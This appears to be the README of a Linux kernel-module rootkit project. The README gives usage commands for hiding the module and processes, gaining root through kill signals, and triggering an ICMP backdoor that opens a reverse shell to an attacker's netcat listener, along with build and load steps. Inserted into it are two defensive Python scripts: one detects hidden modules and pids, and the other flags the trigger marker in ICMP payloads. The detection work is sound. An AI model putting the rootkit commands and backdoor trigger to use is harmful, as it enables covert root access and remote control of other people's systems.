A linux kernel module rootkit w/ an ICMP backdoor

JakeGinesin/j-rootkit

j-rootkit

Tested on Ubuntu 22.04 and Debian 12.4

Usage

Hide/Show rootkit in the list of loaded modules ($ lsmod)

$ kill -63 1

When installed it starts hidden. You can only remove it when it's unhidden.

Become root:

$ kill -64 1

Hide process with pid:

$ kill -62 <pid>

Unhide process with pid:

$ kill -61 <pid>

It also hides every file and directory with prefix rootk_.
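The usage above describes two hiding behaviours a defender can test for from the host: a module unlinked from the list that lsmod reads, and processes removed from the /proc listing. The script below is an added example for this page, not code from the j-rootkit repository. It compares lsmod against /sys/module (only a loaded .ko gets a sections/ directory there) and compares the /proc listing against a brute-force kill(pid, 0) probe over the pid space. The pure functions take their inputs as arguments, the LSMOD_SAMPLE, SYSFS_SAMPLE and PROC_SAMPLE values are constructed, and the live_* wrappers read the real system.

```python
"""Host-side consistency checks for module and process hiding.

Added example for this page; not code from the j-rootkit repository.
The pure functions accept their inputs so they run offline on constructed
data; the live_* wrappers read the running system."""
import os
import subprocess


def modules_from_lsmod(lsmod_text):
    """Module names from `lsmod` output: a header line, then 'name size used_by'."""
    names = set()
    for line in lsmod_text.splitlines()[1:]:
        parts = line.split()
        if parts:
            names.add(parts[0])
    return names


def modules_from_sysfs(sysfs_entries):
    """Names of modules whose code is actually loaded.

    sysfs_entries maps each /sys/module/<name> to whether it has a sections/
    subdirectory. Built-in code that only exposes parameters also gets a
    /sys/module entry, but only a loaded .ko gets sections/."""
    return {name for name, has_sections in sysfs_entries.items() if has_sections}


def hidden_modules(lsmod_text, sysfs_entries):
    """Modules the kernel has loaded but lsmod (the module list) does not show."""
    return sorted(modules_from_sysfs(sysfs_entries) - modules_from_lsmod(lsmod_text))


def pids_from_proc(proc_names):
    """Numeric /proc entries (pids and, if supplied, thread ids)."""
    return {int(name) for name in proc_names if name.isdigit()}


def pids_alive(probe, max_pid):
    """Brute-force the pid space with a probe that says whether a pid exists."""
    return {pid for pid in range(1, max_pid + 1) if probe(pid)}


def hidden_pids(proc_names, probe, max_pid):
    """Pids that answer the probe but have no /proc entry."""
    return sorted(pids_alive(probe, max_pid) - pids_from_proc(proc_names))


def signal0_probe(pid):
    """kill(pid, 0): ESRCH means no such pid; EPERM means it exists but is not ours."""
    try:
        os.kill(pid, 0)
    except ProcessLookupError:
        return False
    except PermissionError:
        return True
    return True


def live_hidden_modules():
    out = subprocess.run(["lsmod"], capture_output=True, text=True, check=True).stdout
    sysfs = {
        name: os.path.isdir(os.path.join("/sys/module", name, "sections"))
        for name in os.listdir("/sys/module")
    }
    return hidden_modules(out, sysfs)


def live_hidden_pids():
    # Collect thread ids too: kill(tid, 0) succeeds for a thread id, so without
    # /proc/<pid>/task every non-leader thread would look hidden.
    visible = []
    for name in os.listdir("/proc"):
        if name.isdigit():
            visible.append(name)
            try:
                visible.extend(os.listdir(os.path.join("/proc", name, "task")))
            except OSError:
                pass  # process exited between the two listings
    with open("/proc/sys/kernel/pid_max") as f:
        max_pid = int(f.read())
    return hidden_pids(visible, signal0_probe, max_pid)


# Constructed sample inputs (not taken from a real host).
LSMOD_SAMPLE = (
    "Module                  Size  Used by\n"
    "nf_tables             294912  0\n"
    "ext4                  983040  1\n"
)
SYSFS_SAMPLE = {"nf_tables": True, "ext4": True, "rootkit": True, "printk": False}
PROC_SAMPLE = ["1", "2", "150", "self", "cpuinfo"]


def sample_probe(pid):
    """Stand-in for signal0_probe over the constructed sample: pid 777 is hidden."""
    return pid in {1, 2, 150, 777}


if __name__ == "__main__":
    print("modules hidden from lsmod:", hidden_modules(LSMOD_SAMPLE, SYSFS_SAMPLE))
    print("pids hidden from /proc:", hidden_pids(PROC_SAMPLE, sample_probe, 1000))
```

Two caveats. A module that also removes its sysfs kobject leaves nothing under /sys/module, so the first check only catches unlinking from the module list. And since this module already intercepts kill() to receive its own signals, a kill(pid, 0) probe answered by the same hook cannot be trusted on its own; corroborate from outside the running kernel (a rescue boot or a memory image) before concluding a host is clean.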

Backdoor

On attacker machine start netcat listener on some port:

$ nc -lnvp <port>

Send ICMP ping to victim:

$ nping --icmp -c 1 --dest-ip <victim-ip> --data-string 'wA@2mC!dq <attacker-ip> <port>'
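The trigger is an ordinary ICMP echo request whose payload starts with the marker from the command above followed by an address and a port, which is what a network sensor would key on. The parser below is an added example for this page, not code from the j-rootkit repository. It splits a raw ICMP message (no IP header) into its header fields, looks for the marker in the payload and validates the two fields after it; the TRIGGER_PACKET and BENIGN_PACKET byte strings are constructed (RFC 5737 address, checksum field left at zero and not verified), and the marker itself is taken from the README.

```python
"""Offline parser for ICMP echo requests that flags the trigger format above.

Added example for this page; not code from the j-rootkit repository."""
import ipaddress
import struct

# Marker as given in the README's nping command; the README shows the rest of
# the payload as "<ip> <port>". The kernel module's exact parsing rules are not
# documented on the page, so the marker is matched anywhere in the payload.
TRIGGER_MARKER = b"wA@2mC!dq"

ICMP_ECHO_REQUEST = 8


def parse_icmp(packet):
    """Split a raw ICMP message (no IP header) into header fields and payload."""
    if len(packet) < 8:
        raise ValueError("ICMP header is 8 bytes; packet too short")
    icmp_type, code, checksum, ident, seq = struct.unpack("!BBHHH", packet[:8])
    return {
        "type": icmp_type,
        "code": code,
        "checksum": checksum,  # not verified here
        "id": ident,
        "seq": seq,
        "payload": packet[8:],
    }


def find_trigger(payload):
    """Return {'ip': ..., 'port': ...} if the payload carries a well-formed trigger."""
    pos = payload.find(TRIGGER_MARKER)
    if pos < 0:
        return None
    fields = payload[pos + len(TRIGGER_MARKER):].split()
    if len(fields) < 2:
        return None
    try:
        ip = ipaddress.ip_address(fields[0].decode("ascii"))
        port = int(fields[1].decode("ascii"))
    except (UnicodeDecodeError, ValueError):
        return None
    if not 0 < port < 65536:
        return None
    return {"ip": str(ip), "port": port}


def classify(packet):
    """Label one raw ICMP message for a sensor: 'trigger', 'echo' or 'other'."""
    msg = parse_icmp(packet)
    if msg["type"] != ICMP_ECHO_REQUEST:
        return "other", None
    hit = find_trigger(msg["payload"])
    return ("trigger", hit) if hit else ("echo", None)


# Constructed samples, not captured traffic. Header: type 8, code 0,
# checksum 0 (unverified), id 0x1234, seq 1 / 2.
TRIGGER_PACKET = bytes([8, 0, 0, 0, 0x12, 0x34, 0, 1]) + b"wA@2mC!dq 192.0.2.10 4444"
# Shape of a stock Linux ping payload: 8 timestamp bytes then 0x10..0x37.
BENIGN_PACKET = bytes([8, 0, 0, 0, 0x12, 0x34, 0, 2]) + bytes(8) + bytes(range(0x10, 0x38))


if __name__ == "__main__":
    for name, pkt in (("trigger", TRIGGER_PACKET), ("benign", BENIGN_PACKET)):
        print(name, classify(pkt))
```

Because the payload is cleartext inside an unremarkable echo request, the marker string is the only reliable network indicator; an IDS signature on that byte sequence, or a rule that alerts on echo payloads containing an address and port in this layout, covers it without needing to decode anything else.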

Install

Compile module and backdoor:

$ make
$ make install

Load module:

$ sudo insmod build/rootkit.ko

Remove

Make sure the module is visible in lsmod. To toggle visibility, run kill -63 1. Then remove it with:

$ sudo rmmod rootkit.ko
